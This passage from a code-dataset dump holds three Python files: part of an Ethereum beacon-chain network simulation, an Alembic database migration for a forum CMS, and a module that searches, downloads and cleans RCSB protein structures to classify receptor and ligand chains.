set(get_all_sets_for_validator(network, validator_index))\n return items_known_by_sets(network, info_sets)\n\ndef knowledge_set_union(\n network: Network,\n validator_indices: Sequence[ValidatorIndex]\n) -> Dict[str, Sequence[Container]]:\n # Known network items of validators in `validator_indices`\n\n info_sets = set(get_all_sets_for_validators(network, validator_indices))\n return items_known_by_sets(network, info_sets)\n\ndef ask_to_check_backlog(network: Network,\n validator_indices: Set[ValidatorIndex]) -> None:\n # Called right after a message (block or attestation) was sent to `validator_indices`\n # Asks validators to check if they can e.g., definitely include attestations in their\n # latest messages or record blocks.\n for validator_index in validator_indices:\n validator = network.validators[validator_index]\n\n # Check if there are pending attestations/blocks that can be recorded\n known_items = knowledge_set(network, validator_index)\n validator.check_backlog(known_items)\n\ndef disseminate_attestations(network: Network, items: Sequence[Tuple[ValidatorIndex, Attestation]]) -> None:\n # We get a set of attestations and disseminate them over the network\n\n # Finding out who receives a new attestation\n broadcast_validators = set()\n for item in items:\n sender = item[0]\n attestation = item[1]\n broadcast_list = get_all_sets_for_validator(network, sender)\n\n # The sender records that they have sent an attestation\n network.validators[sender].log_attestation(attestation)\n\n # Adding the attestation to network items\n networkItem = NetworkAttestation(item=attestation, info_sets=broadcast_list)\n network.attestations.append(networkItem)\n\n # Update list of validators who received a new item\n for info_set_index in broadcast_list:\n broadcast_validators |= set(network.sets[info_set_index].validators)\n\n ask_to_check_backlog(network, broadcast_validators)\n\ndef disseminate_sync_committees(network: Network, items: Sequence[Tuple[ValidatorIndex, SyncCommitteeBundle]]) -> None:\n # We get a set of sync committees and disseminate them over the network\n\n # Finding out who receives a new attestation\n broadcast_validators = set()\n for item in items:\n sender = item[0]\n sc_bundle = item[1]\n broadcast_list = get_all_sets_for_validator(network, sender)\n\n # The sender records that they have sent an attestation\n network.validators[sender].log_sync_committee(sc_bundle)\n\n # Adding the attestation to network items\n networkItem = NetworkSyncCommittee(item=sc_bundle, info_sets=broadcast_list)\n network.sync_committees.append(networkItem)\n\n # Update list of validators who received a new item\n for info_set_index in broadcast_list:\n broadcast_validators |= set(network.sets[info_set_index].validators)\n\n ask_to_check_backlog(network, broadcast_validators)\n\ndef disseminate_block(network: Network,\n sender: ValidatorIndex,\n item: SignedBeaconBlock,\n to_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT] = None) -> None:\n # `sender` disseminates a block to its information sets, i.e., other validators they are peering\n # with.\n\n # Getting all the sets that `sender` belongs to\n broadcast_list = get_all_sets_for_validator(network, sender) if to_sets is None else to_sets\n\n # The validator records that they have sent a block\n network.validators[sender].log_block(item)\n\n # Adding the block to network items\n networkItem = NetworkBlock(item=item, info_sets=broadcast_list)\n network.blocks.append(networkItem)\n\n # A set of all validators who need to update their internals 
after reception of the block\n broadcast_validators = set()\n for info_set_index in broadcast_list:\n broadcast_validators |= set(network.sets[info_set_index].validators)\n\n ask_to_check_backlog(network, broadcast_validators)\n\ndef update_network(network: Network) -> None:\n # The \"heartbeat\" of the network. When called, items propagate one step further on the network.\n\n # We need to propagate both blocks and attestations\n item_sets = [network.blocks, network.attestations]\n\n # These are the validators who receive a new item (block or attestation)\n broadcast_validators = set()\n\n for item_set in item_sets:\n for item in item_set:\n # For each item, we find the new validators who hear about it for the first time\n # and the validators who already do. Items propagate from validators who know about them.\n known_validators = set()\n for info_set in item.info_sets:\n known_validators = known_validators.union(set(network.sets[info_set].validators))\n\n # When a validator belongs to a set A where the item was propagated AND\n # to a set B where it wasn't, the validator propagates the item to set B\n unknown_sets = [i for i, s in enumerate(network.sets) if i not in item.info_sets]\n for unknown_set in unknown_sets:\n new_validators = set(network.sets[unknown_set].validators)\n for new_validator in new_validators:\n if new_validator in known_validators and new_validator not in network.malicious:\n item.info_sets.append(unknown_set)\n broadcast_validators |= new_validators\n break\n\n ask_to_check_backlog(network, broadcast_validators)\n","sub_path":"notebooks/reorg/beaconrunner/model/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":8842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151250450","text":"\"\"\"empty message\n\nRevision ID: 283656f60272\nRevises: \nCreate Date: 2018-07-13 19:24:09.979017\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '283656f60272'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('banner',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('banner_name', sa.String(length=250), nullable=False),\n sa.Column('image_url', sa.String(length=250), nullable=False),\n sa.Column('link_url', sa.String(length=250), nullable=False),\n sa.Column('priority', sa.Integer(), nullable=True),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('board',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('board_name', sa.String(length=20), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('cmsrole',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=100), nullable=False),\n sa.Column('desc', sa.String(length=200), nullable=True),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.Column('permissions', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('cmsuser',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('username', sa.String(length=100), nullable=False),\n sa.Column('_password', sa.String(length=1500), nullable=False),\n sa.Column('email', sa.String(length=100), nullable=False),\n sa.Column('join_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('front_user',\n sa.Column('id', sa.String(length=100), nullable=False),\n sa.Column('telephone', sa.String(length=12), nullable=True),\n sa.Column('username', sa.String(length=100), nullable=False),\n sa.Column('_password', sa.String(length=1500), nullable=False),\n sa.Column('email', sa.String(length=30), nullable=True),\n sa.Column('realname', sa.String(length=50), nullable=True),\n sa.Column('avatar', sa.String(length=100), nullable=True),\n sa.Column('singature', sa.String(length=100), nullable=True),\n sa.Column('gender', sa.String(length=10), nullable=True),\n sa.Column('join_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('telephone')\n )\n op.create_table('cms_role_user',\n sa.Column('cms_role_id', sa.Integer(), nullable=False),\n sa.Column('cms_user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['cms_role_id'], ['cmsrole.id'], ),\n sa.ForeignKeyConstraint(['cms_user_id'], ['cmsuser.id'], ),\n sa.PrimaryKeyConstraint('cms_role_id', 'cms_user_id')\n )\n op.create_table('follow',\n sa.Column('follower_id', sa.String(length=100), nullable=False),\n sa.Column('followed_id', sa.String(length=100), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['followed_id'], ['front_user.id'], ),\n sa.ForeignKeyConstraint(['follower_id'], ['front_user.id'], ),\n sa.PrimaryKeyConstraint('follower_id', 'followed_id')\n )\n op.create_table('post',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('title', sa.String(length=200), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.Column('hit', sa.Integer(), nullable=True),\n sa.Column('comment_num', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.String(length=100), nullable=False),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['author_id'], ['front_user.id'], ondelete='CASCADE'),\n 
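# note: author_id cascades on delete (a user's posts are removed with the user); the board foreign key below carries no ondelete rule\n    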
sa.ForeignKeyConstraint(['board_id'], ['board.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('comment',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.String(length=100), nullable=True),\n sa.ForeignKeyConstraint(['author_id'], ['front_user.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('highlight_post',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('highlight_post')\n op.drop_table('comment')\n op.drop_table('post')\n op.drop_table('follow')\n op.drop_table('cms_role_user')\n op.drop_table('front_user')\n op.drop_table('cmsuser')\n op.drop_table('cmsrole')\n op.drop_table('board')\n op.drop_table('banner')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/283656f60272_.py","file_name":"283656f60272_.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498864458","text":"import urllib.request\nimport pandas as pd\nimport pathlib\nfrom Bio import pairwise2\nfrom Bio.pairwise2 import format_alignment\nimport numpy as np\nimport os \nimport Bio.PDB\nfrom operator import itemgetter\nfrom itertools import groupby\nimport warnings\n\n# silence biopython warning \nfrom Bio import BiopythonWarning\nwarnings.simplefilter('ignore', BiopythonWarning)\n\n\n#### Download pdb and get information about them\n\nclass get_pdbs(object):\n def __init__(self,seq_template,template_type,cutoff=80.0):\n '''\n seq_template: searching sequence template (can be residue sequence or PDBID_CHAINID)\n template_type: 'pdb' or 'fasta' \n cutoff: similarity cutoff \n '''\n self.seq_template = seq_template\n self.template_type = template_type\n self.cutoff = cutoff\n\n\n def search_for_seq(self):\n '''\n search pdb database by sequence similarity comparing to seq_template pdb or fasta sequence. 
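(An illustrative use, with a made-up FASTA fragment: get_pdbs('MKTAYIAKQR', 'fasta', cutoff=85.0).search_for_seq() fills self.pdb_ids; only the sequence here is invented.) 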
Structures with similarity higher than the cutoff value are kept;\n matching PDB ids are stored in self.pdb_ids\n '''\n\n url = 'http://www.rcsb.org/pdb/rest/search'\n if self.template_type == 'pdb':\n PDB_id = self.seq_template[:4]\n chain = self.seq_template[-1]\n sequence =''\n elif self.template_type == 'fasta':\n PDB_id =''\n chain = ''\n sequence = self.seq_template\n else:\n print('input type error!')\n\n queryText = \"\"\"\n <orgPdbQuery>\n <queryType>org.pdb.query.simple.SequenceQuery</queryType>\n <description>Sequence Search (Structure:Chain = %s:%s, Expectation Value = 90.0, Search Tool = BLAST)</description>\n <structureId>%s</structureId>\n <chainId>%s</chainId>\n <sequence>%s</sequence>\n <eCutOff>%s</eCutOff>\n <searchTool>blast</searchTool>\n <sequenceIdentityCutoff>%s</sequenceIdentityCutoff>\n </orgPdbQuery>\n \"\"\"%(PDB_id,chain, PDB_id, chain, sequence, self.cutoff, self.cutoff)\n\n print(\"querying PDB ID ...\\n\")\n\n req = urllib.request.Request(url=url, data=queryText.encode('UTF-8'))\n f = urllib.request.urlopen(req)\n result = f.read()\n\n if result:\n print (\"Found number of PDB entries:\", result.decode('UTF-8').count('\\n'))\n self.pdb_ids = [l[0:4] for l in result.decode('UTF-8').split('\\n')][0:-1]\n #outfile = open(result_file,'w')\n #outfile.write(result.decode('UTF-8'))\n #outfile.close()\n\n else:\n print(\"Failed to retrieve results\")\n\n #pdb_id_list = [l[0:4] for l in result.decode('UTF-8').split('\\n')][0:-1]\n #return pdb_id_list\n\n\n def get_pdb_info(self,pdb_id_list=None):\n '''\n Use to get pdb structural info such as experimental technique, deposit date, resolution, chain length etc.\n\n param:\n pdb_id_list : a list of pdb ids. If None, self.pdb_ids is used. \n #result_file: a file contains pdb details of entries in pdb_id_list \n\n\n '''\n if not pdb_id_list:\n pdb_id_list = self.pdb_ids\n pdb_id_query = ','.join(pdb_id_list)\n queryText = \"http://www.rcsb.org/pdb/rest/customReport.csv?pdbids=\" + pdb_id_query + \\\n \"&customReportColumns=experimentalTechnique,depositionDate,resolution,chainLength,\" + \\\n \"uniprotRecommendedName,geneName,source,phValue,rFree,averageBFactor,ligandId,ligandSmiles,Ki,Kd,IC50\" \\\n + \"&service=wsdisplay&format=csv&ssa=nul\"\n\n\n print(\"querying PDB information... \\n\")\n\n\n f = urllib.request.urlopen(queryText)\n result = f.read()\n result = result.decode('UTF-8')\n xml_file = result.split('<br />')
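\n # the legacy customReport endpoint returns report rows separated by literal '<br />' tags rather than newlines, hence the split marker above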
\n xml_header = xml_file[0].split(',')\n index = len(xml_file)-1\n df = pd.DataFrame(index=range(1,index), columns=xml_header)\n a = 1\n for l in xml_file[1:-1]:\n b = 0\n for j in xml_header:\n df[j][a] = l.split(',')[b].strip('\"')\n b += 1\n a += 1\n\n #for i in df.index:\n # if df['ligandId'][i] in self.unwanted_hetatms:\n # df['ligandId'][i] = np.nan\n # df['ligandSmiles'][i] = np.nan\n #df.drop([i], inplace=True)\n #df.drop_duplicates(subset=['structureId','chainId','ligandId'],inplace=True)\n #df.reset_index(inplace=True,drop=True)\n #df.to_csv(result_file,index_label='index')\n self.pdb_info = df\n\n\n\n def download_pdb(self,pdb_id,output_pdb):\n '''\n Use to download a single pdb\n :param pdb_id: structure pdb id\n #output_pdb: output pdb file (dir/pdb_id.pdb)\n :return: None\n '''\n output_dir = '/'.join(output_pdb.split('/')[0:-1])\n os.makedirs(output_dir,exist_ok=True)\n try:\n urllib.request.urlretrieve('https://files.rcsb.org/download/%s.pdb'%pdb_id, output_pdb)\n except:\n print('Unable to download ' + pdb_id) \n\n\n def clean_pdb(self,pdb,output_pdb):\n '''\n clean pdb structure: fix insertion and alternative locations of atoms \n :param pdb: raw pdb file \n output_pdb: clean pdb file \n '''\n clean_pdb_dir = '/'.join(output_pdb.split('/')[0:-1])\n os.makedirs(clean_pdb_dir,exist_ok=True)\n \n# all_lines = [l for l in open(pdb,'r').readlines() if l.startswith('ATOM') or l.startswith('HETATM') or\\\n# l.startswith('TER') or l.startswith('MODEL') or l.startswith('ENDMDL')]\n all_lines = open(pdb,'r').readlines()\n atom_lines = [l for l in all_lines if l.startswith('ATOM') or l.startswith('HETATM') or l.startswith('TER')]\n resi_label = atom_lines[0][22:27]\n resi_count = int(atom_lines[0][22:26])\n new_lines = []\n insertion = False\n for l in all_lines:\n if l.startswith('ATOM') or l.startswith('HETATM') or l.startswith('TER'):\n\n entry_type = l[0:6]\n altLoc = l[16]\n resi_label_new = l[22:27]\n icode = l[26]\n occupancy = l[54:60]\n\n # count number of residues by different residue label\n if resi_label_new != resi_label:\n resi_count +=1\n resi_label = resi_label_new\n altLoc_type = [] \n # label numbering shift if insertion happened\n if icode != ' ':\n insertion = True\n\n # fix residue number by residue count\n if insertion:\n l = l[0:22] + str(resi_count).rjust(4) + ' ' + l[27:]\n\n # for atom and hetatm with alternative position, keep those with occupancy >= 0.5\n\n if altLoc != ' ':\n if not altLoc in altLoc_type:\n altLoc_type.append(altLoc)\n\n #if (entry_type == 'ATOM ') and (altLoc == 'A'):\n # l = l[0:16] + ' ' + l[17:]\n # new_lines.append(l)\n if float(occupancy) >0.5:\n l = l[0:16] + ' ' + l[17:]\n new_lines.append(l)\n elif (float(occupancy) == 0.5) and (altLoc == altLoc_type[0]):\n l = l[0:16] + ' ' + l[17:]\n new_lines.append(l)\n\n elif entry_type == 'TER ':\n new_lines.append(l)\n else:\n new_lines.append(l)\n else:\n new_lines.append(l)\n output = open(output_pdb,'w')\n output.writelines(new_lines)\n\n\nclass complex_info(object):\n def __init__(self,pdb_info_csv,pdb_dir,unwanted_hetatms='default'):\n '''\n For each receptor chain get its ligand (can be either a peptide or a small molecule).\n Process cleaned pdb structures: get receptor and ligand info, separate receptor and ligand structures, etc.
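A typical construction, with placeholder paths: complex_info('pdb_info.csv', './clean_pdbs').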
\n param:\n pdb_info_csv: csv file generated from get_pdbs class \n pdb_dir: folder containing all pdbs listed in pdb_info_csv\n '''\n if type(pdb_info_csv) == str:\n if os.path.exists(pdb_info_csv) and pdb_info_csv.endswith('.csv'):\n self.df = pd.read_csv(pdb_info_csv,index_col='index')\n else:\n raise ValueError('unknown file type of pdb_info_csv. pdb_info_csv can be a csv file or a pandas DataFrame')\n elif type(pdb_info_csv) == pd.core.frame.DataFrame:\n self.df = pdb_info_csv\n else:\n raise ValueError('unknown file type of pdb_info_csv. pdb_info_csv can be a csv file or a pandas DataFrame')\n #self.pdb_info_csv = pdb_info_csv\n self.pdb_dir = pdb_dir\n if unwanted_hetatms == 'default':\n additive = ['1PE', 'ACT', 'AML', 'BCN', 'BEZ', 'BME', 'CIT', 'CO3', 'DMF','DMS', 'DTT', 'EDO', 'FMT', 'GOL',\n 'IMD', 'IPA', 'MES', 'MLA', 'MRD', 'PEG', 'PGE', 'PO4', 'SAR', 'SGM', 'SO4', 'SPK', 'TAR', 'TLA', 'TMO',\n 'TRS']\n\n ions = ['IOD', 'NA', 'BR', 'CL', 'K', 'SIN', 'ZN','MG']\n water = ['HOH']\n other = ['P15','PEU','EOH','O4B','MPO','GAI','PG4','MPD']\n self.unwanted_hetatms = additive + ions + water + other \n\n\n def get_receptor_ligand_info(self,template, template_type, template_pdb_dir=None, template_expt_type=None):\n ''' 1. For chains in a complex, distinguish receptor chains and peptide chains by a. sequence length and %alignment with template receptor chain \n 2. Check starting and ending residue id, sequence, gaps in receptor chain comparing to a template receptor chain \n 3. Get each receptor chains ligand info \n\n\n :param template_pdb_dir: folder containing template pdb \n :param template: pdb file use to define residue numbering and protein sequence, format pdbid_chainid or fasta AA sequence\n :param template_type: pdb or fasta\n :param template_pdb_dir: folder containing template pdb file (only needed for template_type == pdb)\n :param template_expt_type: SOLUTION NMR or X-RAY (only required for template_type == pdb) \n\n Note:\n 1. each receptor chain is aligned with template seq to get starting and ending residue number\n 2. 
peptide ligand chain screened as seq has poor match with the template sequence \n '''\n\n # get template sequence info \n if template_type == 'pdb':\n template_pdb = template.split('_')[0]\n template_chain = template.split('_')[1]\n if template_expt_type:\n temp_resStart, temp_resEnd, temp_seq = self._get_chain_res_info(template_pdb,template_chain,template_expt_type,\n pdb_folder=template_pdb_dir)\n else:\n raise ValueError('template_expt_type should be SOLUTION NMR or X-RAY')\n elif template_type == 'fasta':\n temp_resStart = 0\n temp_resEnd = len(template)-1\n temp_seq = template\n else:\n print('wrong template type')\n \n \n # pdb chains list \n# pdb_chains = self.df[['structureId','chainId','experimentalTechnique']].copy()\n# pdb_chains.drop_duplicates(inplace=True)\n # result header \n #A complex is a receptor chain with its ligand \n complex_info = np.append(self.df.columns,['resStart','resEnd','sequence_by_pdb_aligned','mutation','ligand_type', \\\n 'ligand_residue_id']).reshape(1,-1)\n\n # Peptide ligand info\n peptide_info = np.append(self.df.columns,['resStart','resEnd','sequence']).reshape(1,-1)\n\n# for i in pdb_chains.index:\n for i in self.df.index:\n #pdb = pdb_chains['structureId'][i]\n #chain = pdb_chains['chainId'][i]\n #expt_type = pdb_chains['experimentalTechnique'][i]\n\n pdb = self.df['structureId'].loc[i]\n chain = self.df['chainId'].loc[i]\n expt_type = self.df['experimentalTechnique'].loc[i]\n lig_name = self.df['ligandId'].loc[i]\n\n if not lig_name in self.unwanted_hetatms:\n #print(lig_name)\n if not (lig_name == '' or pd.isna(lig_name)):\n # distinguish regular ligand and modified residues \n lig_type, lig_resi_id = self._check_ligand(pdb,chain,lig_name,pdb_folder=self.pdb_dir)\n else:\n lig_type = 'apo'\n lig_resi_id = np.nan\n # get chain sequence info, modified residues are considered as part of the protein sequences \n resStart_pdb, resEnd_pdb, seq = self._get_chain_res_info(pdb,chain,expt_type,pdb_folder=self.pdb_dir)\n # get alignment result \n head_diff, end_diff, mutation, aligned_seq = self._align_seq(seq,temp_seq)\n if head_diff == None : ## head_diff == None indicates poor alignment --> not receptor chain\n peptide_info_entry = np.append(self.df.loc[i].tolist(), [resStart_pdb,resEnd_pdb,seq]).reshape(1,-1)\n peptide_info = np.append(peptide_info,peptide_info_entry,axis=0)\n \n else: \n # fix resStart and resEnd index using template seq residue indexing as reference \n resStart = int(temp_resStart) - head_diff \n resEnd = int(temp_resEnd) + end_diff \n # fix mutation site index using template seq residue indexing \n mut_new_list = [] \n for mut in mutation:\n mut_loc = int(mut[1:-1])\n if head_diff >= 0: \n mut_loc = mut_loc - head_diff \n else:\n mut_loc = mut_loc \n mut_new = mut[0] + str(mut_loc) + mut[-1]\n mut_new_list.append(mut_new)\n mutation_new = ';'.join(mut_new_list)\n\n \n # here only small molecule ligand is considered, peptide binder will be filled in later\n if lig_type in ['noncovalent','covalent','apo']:\n complex_info_entry = np.append(self.df.loc[i].tolist(),[resStart,resEnd,aligned_seq,mutation_new,lig_type,lig_resi_id]).reshape(1,-1)\n else: # in the case of modres\n new_df_info = self.df.loc[i].copy()\n new_df_info['ligandId'] = np.nan\n new_df_info['ligandSmiles'] = np.nan\n new_df_info['Ki'] = np.nan\n new_df_info['Kd'] = np.nan\n new_df_info['IC50'] = np.nan\n\n complex_info_entry = np.append(new_df_info.tolist(), [resStart,resEnd,aligned_seq,mutation_new,np.nan,np.nan]).reshape(1,-1)\n complex_info = 
np.append(complex_info,complex_info_entry,axis=0)\n else:\n pass\n \n complex_info_df = pd.DataFrame(data=complex_info[1:,:],columns=complex_info[0,:])\n complex_info_df.drop_duplicates(subset=['structureId','chainId','ligandId'],inplace=True)\n peptide_info_df = pd.DataFrame(data=peptide_info[1:,:],columns=peptide_info[0,:])\n peptide_pdbs = set(peptide_info_df['structureId'].tolist())\n\n \n peptide_ligand = complex_info_df.copy()\n peptide_ligand.drop_duplicates(subset=['structureId','chainId'],inplace=True)\n # fill in peptide inhibitor info\n peptide_drop_list = [] \n for i in peptide_ligand.index:\n pdb = peptide_ligand['structureId'].loc[i]\n chain = peptide_ligand['chainId'].loc[i]\n if pdb in peptide_pdbs:\n \n all_recep_chains = [c for c in peptide_ligand.loc[peptide_ligand['structureId'] == pdb]['chainId'].tolist()]\n peptide_chain = self._check_closest_peptide(pdb,chain, all_recep_chains, pdb_folder=self.pdb_dir)\n #print(peptide_chain)\n if peptide_chain:\n peptide_ligand['ligand_type'].loc[i] = 'peptide'\n peptide_ligand['ligandId'].loc[i] = peptide_chain \n peptide_ligand['ligand_residue_id'].loc[i] = peptide_chain\n peptide_ligand['Ki'].loc[i] = np.nan\n peptide_ligand['Kd'].loc[i] = np.nan\n peptide_ligand['IC50'].loc[i] = np.nan\n else: # if no nearby peptide chains detected, drop that row \n peptide_drop_list.append(i)\n else:\n peptide_drop_list.append(i)\n peptide_ligand.drop(peptide_drop_list,inplace=True)\n \n # label ligand binding site. If a chain has multiple ligands bound, each ligand is occupying a separate binding site.\n complex_all = pd.concat([complex_info_df,peptide_ligand],axis=0)\n complex_all.reset_index(inplace=True,drop=True)\n \n\n binding_site = [-1] * complex_all.shape[0] \n drop_list = [] \n for i in complex_all.index:\n pdb = complex_all['structureId'].loc[i]\n chain = complex_all['chainId'].loc[i]\n if binding_site[i] != -1:\n continue\n # print(pdb,chain)\n temp = complex_all.loc[(complex_all['structureId'] == pdb) & (complex_all['chainId'] == chain)]\n if temp.shape[0] > 1:\n site_count = 0\n for ind in temp.index:\n if not pd.isna(temp['ligandId'].loc[ind]):\n binding_site[ind] = site_count \n site_count += 1\n else:\n if not ind in drop_list:\n drop_list.append(ind)\n\n\n else:\n if pd.isna(complex_all['ligand_type'].loc[i]): # in the case of modres, ligand_type is originially set to np.nan. If after peptide ligand info updated, this chain still does not have a ligand, it should be an apo chain. \n complex_all['ligand_type'].loc[i] = 'apo' \n binding_site[i] = 0 \n \n complex_all.insert(complex_all.shape[1],'binding_site',binding_site) \n complex_all.drop(drop_list,inplace=True)\n self.complex_info = complex_all\n #self.peptide_info = peptide_info_df\n # Note: 2RUH has protein and peptide inhibitors linked together (CatS pdbs)\n\n @staticmethod\n def _check_ligand(pdb,chain,ligand_name,pdb_folder):\n '''\n For a ligand, find its residue id and check if it's a noncovalent ligand. 
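An illustrative call (all values made up): _check_ligand('1ABC', 'A', 'STI', './pdbs') -> ('noncovalent', '401').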
\n \n :param pdb: pdb id\n :param chain: chain id\n :param ligand_name: the residue name of the ligand \n :param pdb_folder: folder for pdb files\n :return: ligand name list, number of ligands (one ligand name can have two ligands at diff sites)\n\n Note: additive, ions, water, and other cocrystal solvent is not considered as ligands\n '''\n pdb_lines = open(pdb_folder + '/' + pdb + '.pdb','r').readlines()\n link_lines = [l for l in pdb_lines if l.startswith('LINK')] \n link_resi = [q for t in [[l.split()[2],l.split()[6]] for l in link_lines] for q in t]\n modres_lines = [l for l in pdb_lines if l.startswith('MODRES')]\n modres = [l.split()[2] for l in modres_lines] \n\n #print(type(ligand_name))\n #print(ligand_name)\n if (ligand_name in link_resi) and (not ligand_name in modres):\n ligand_type = 'covalent'\n elif ligand_name in modres:\n ligand_type = 'modified residue'\n else:\n ligand_type = 'noncovalent'\n #print(ligand_name)\n for l in pdb_lines:\n if l[21] == chain and l[17:20].strip() == ligand_name and (l.startswith('ATOM') or l.startswith('HETATM')):\n ligand_resi_id = l[22:26].strip()\n break \n else:\n continue \n return ligand_type, ligand_resi_id\n\n# def _check_chain_hetatm(pdb,chain,pdb_folder):\n#\n# chain_lines = [l for l in pdb_lines if (l[21] == chain) and (l[17:20].strip() not in unwanted_hetatms)]\n#\n#\n# modified_resi = [] \n# modified_resi_id = [] \n# lig_resi =[]\n# lig_resi_id = [] \n#\n# hetatm_resi = [] \n# hetatm_resi_id = []\n# other_atm = False\n# for l in chain_lines: \n# if l.startswith('TER'):\n# \n# hetatm_resi_count = len(hetatm_resi)\n# if (hetatm_resi_count > 1) or (hetatm_resi_count == 1 and other_atm == True):\n# modified_resi.extend(hetatm_resi)\n# modified_resi_id.extend(hetatm_resi_id)\n# elif hetatm_resi_count == 1 and other_atm == False: \n# lig_resi.extend(hetatm_resi)\n# lig_resi_id.extend(hetatm_resi_id)\n# else:\n# pass \n# hetatm_resi = [] \n# hetatm_resi_id = []\n# other_atm = False \n#\n# elif l.startswith('HETATM'):\n# resi_name = l[17:20].strip()\n# resi_id = l[22:26].strip()\n# if not resi_id in hetatm_resi_id:\n# hetatm_resi_id.append(resi_id)\n# hetatm_resi.append(resi_name)\n# \n# elif l.startswith('ATOM'):\n# other_atm = True \n#\n# hetatm_resi_count = len(hetatm_resi)\n# if (hetatm_resi_count > 1) or (hetatm_resi_count == 1 and other_atm == True):\n# modified_resi.extend(hetatm_resi)\n# modified_resi_id.extend(hetatm_resi_id)\n# elif hetatm_resi_count == 1 and other_atm == False: \n# lig_resi.extend(hetatm_resi)\n# lig_resi_id.extend(hetatm_resi_id)\n# else:\n# pass \n#\n#\n# if modified_resi != []:\n# print(pdb + ' chain ' + chain + ' has nonstandard residues')\n## print('modified residues :')\n# print(modified_resi, modified_resi_id)\n#\n# \n# return lig_resi, lig_resi_id, modified_resi, modified_resi_id\n \n @staticmethod\n def _check_closest_peptide(pdb,chain,all_recep_chains, pdb_folder):\n '''\n for pdbs with peptide as ligand, get peptide chain id as ligand name\n :param pdb: pdb id\n :param chain: chain id\n :param receptor_csv: pandas dataframe containing receptor chain info\n :param pdb_folder: folder containing all pdb files\n :return: peptide ligand chain id\n '''\n\n\n def _calc_residue_dist(residue_one, residue_two):\n '''\n\n :param residue_one:\n :param residue_two:\n :return: return c-alpha distance between two residues\n '''\n diff_vector = residue_one['CA'].coord - residue_two['CA'].coord\n return np.sqrt(np.sum(diff_vector * diff_vector))\n\n def _calc_dist_matrix(chain_one, chain_two):\n '''\n\n :param 
chain_one:\n :param chain_two:\n :return: a matrix of C-alpha distance between two chains\n\n '''\n\n chain_one_resi = [i for i in chain_one for atom in i if atom.get_full_id()[4][0] == 'CA'] #get rid of wat and\n # capping which has no CA\n chain_two_resi = [i for i in chain_two for atom in i if atom.get_full_id()[4][0] == 'CA']\n\n answer = np.zeros((len(chain_one_resi),len(chain_two_resi)), np.float)\n for row, residue_one in enumerate(chain_one_resi):\n for col, residue_two in enumerate(chain_two_resi):\n answer[row,col] = _calc_residue_dist(residue_one, residue_two)\n return answer\n\n structure = Bio.PDB.PDBParser().get_structure(pdb,pdb_folder + '/' + pdb + '.pdb')\n model = structure[0] #in each model, it list all chains, unique chain id is considered as a seperate chain.\n # NMR structures has same chain id in different model, crystal structure has different chain id for diff monomer\n ref_chain = chain\n peptide_chain = None\n #print('all models ')\n if len(model) > 2: # non monomer and NMR including several models\n num_contact = 0\n for chain_name in model:\n #print(chain_name)\n chain_id = chain_name.get_full_id()[2]\n if chain_id != ref_chain and (chain_id not in all_recep_chains):\n dist_matrix = _calc_dist_matrix(model[chain_id], model[ref_chain])\n contact_array = np.where(dist_matrix < 8)\n num_contact_new = len(contact_array[0])\n\n if num_contact_new > num_contact:\n num_contact = num_contact_new\n peptide_chain = chain_id\n\n\n\n\n else: # monomer\n for chain_name in model:\n chain_id = chain_name.get_full_id()[2]\n if not chain_id == ref_chain:\n peptide_chain = chain_id\n return peptide_chain\n\n @staticmethod\n def _get_chain_res_info(pdb,chain,exp_type,pdb_folder):\n '''\n Get starting and ending residue id from pdb file and get sequence\n :param pdb: pdb id\n :param chain: chain id\n :return: starting residue id and ending residue id and AA sequence\n\n '''\n letters = {'ALA': 'A', 'ARG': 'R', 'ASN': 'N', 'ASP': 'D', 'CYS': 'C', 'GLU': 'E', 'GLN': 'Q', 'GLY': 